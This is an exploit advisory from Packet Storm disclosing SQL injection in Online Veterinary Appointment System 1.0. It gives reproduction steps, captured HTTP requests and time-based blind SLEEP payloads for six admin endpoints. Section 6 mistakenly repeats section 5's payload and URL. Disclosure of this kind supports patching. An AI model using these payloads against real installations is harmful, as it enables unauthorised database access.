what you don't know can hurt you

Online Veterinary Appointment System 1.0 SQL Injection

Online Veterinary Appointment System 1.0 SQL Injection
Posted Jan 7, 2022
Authored by twseptian

Online Veterinary Appointment System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
MD5 | 31f9c323e9b7c88dd7dcfdbbae83009f

Online Veterinary Appointment System 1.0 SQL Injection

Change Mirror Download
# Exploit Title: Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection
# Date: 05/01/20222
# Exploit Author: twseptian
# Vendor Homepage: https://www.sourcecodester.com/php/15119/online-veterinary-appointment-system-using-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/ovas.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4

=====================================================================================================================================
SQL Injection:
=====================================================================================================================================
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Online Veterinary Appointment System 1.0 is vulnerable to 'Multiple' SQL injections.

=====================================================================================================================================
Attack Vector:
=====================================================================================================================================
An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.

=====================================================================================================================================
1. Appointment Requests - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Appointment Requests' page using the following URL:

http://localhost/ovas/admin/?page=appointments

then go to 'Action' > 'View'.

Step-2: Put the SQL Injection payloads in 'id' field.
time-based blind payload : page=appointments/view_details&id=1' AND (SELECT 2197 FROM (SELECT(SLEEP(5)))DZwi) AND 'mQQq'='mQQq

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
2. Inquiries - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Inquiries' page using the following URL:

http://localhost/ovas/admin/?page=inquiries

then go to 'Action' > 'View'.

Step-2: Let's intercept 'View' request using burpsuite:

GET /ovas/admin/inquiries/view_details.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=inquiries
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/inquiries/view_details.php?id=1' AND (SELECT 6051 FROM (SELECT(SLEEP(5)))DEds) AND 'SOxP'='SOxP

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
3. My Account - Vulnerable Parameter(s): id,firstname,lastname,username
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'My Account' page using the following URL:

http://localhost/ovas/admin/?page=user

Step-2: then let's intercept 'Update' request using burpsuite:

POST /ovas/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------24959341351495697487735843118
Content-Length: 796
Origin: http://localhost
Connection: close
Referer: http://localhost/ovas/admin/?page=user
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="id"

4
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="firstname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="lastname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="username"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="password"


-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------24959341351495697487735843118--

Put the SQL Injection payloads in Vulnerable Parameter(s): id,firstname,lastname,username
for example, the time-based blind payload in 'id':

[SNIP]
Content-Disposition: form-data; name="id"

4 AND (SELECT 9713 FROM (SELECT(SLEEP(5)))YIam)
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="firstname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="lastname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="username"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="password"


-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------24959341351495697487735843118--

Step-3: If we use BurpSuite, click 'Send'. The server target accepted our payload, and the response got delayed by 5 seconds. The same thing for other parameters

=====================================================================================================================================
4. Category List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Category List ' page using the following URL:

http://localhost/ovas/admin/?page=categories

then go to 'Action' > 'Edit'

Step-2: Let's intercept 'Edit' request using burpsuite:

GET /ovas/admin/categories/manage_category.php?id=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=categories
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/categories/manage_category.php?id=2' AND (SELECT 3851 FROM (SELECT(SLEEP(5)))UFXk) AND 'XbFb'='XbFb

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
5. Service List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Service List ' page using the following URL:

http://localhost/ovas/admin/?page=services

then go to 'Action' > 'View'

Step-2: Let's intercept 'View' request using burpsuite:

GET /ovas/admin/services/view_service.php?id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=services
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
6. Admin User List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Admin User List ' page using the following URL:

http://localhost/ovas/admin/?page=user/list

then go to 'Action' > 'Edit'

Step-2: Let's intercept 'Edit' request using burpsuite:

GET /ovas/admin/?page=user/manage_user&id=3 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/ovas/admin/?page=user/list
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    2 Files
  • 16
    Jan 16th
    2 Files
  • 17
    Jan 17th
    18 Files
  • 18
    Jan 18th
    13 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    29 Files
  • 21
    Jan 21st
    12 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    17 Files
  • 25
    Jan 25th
    34 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close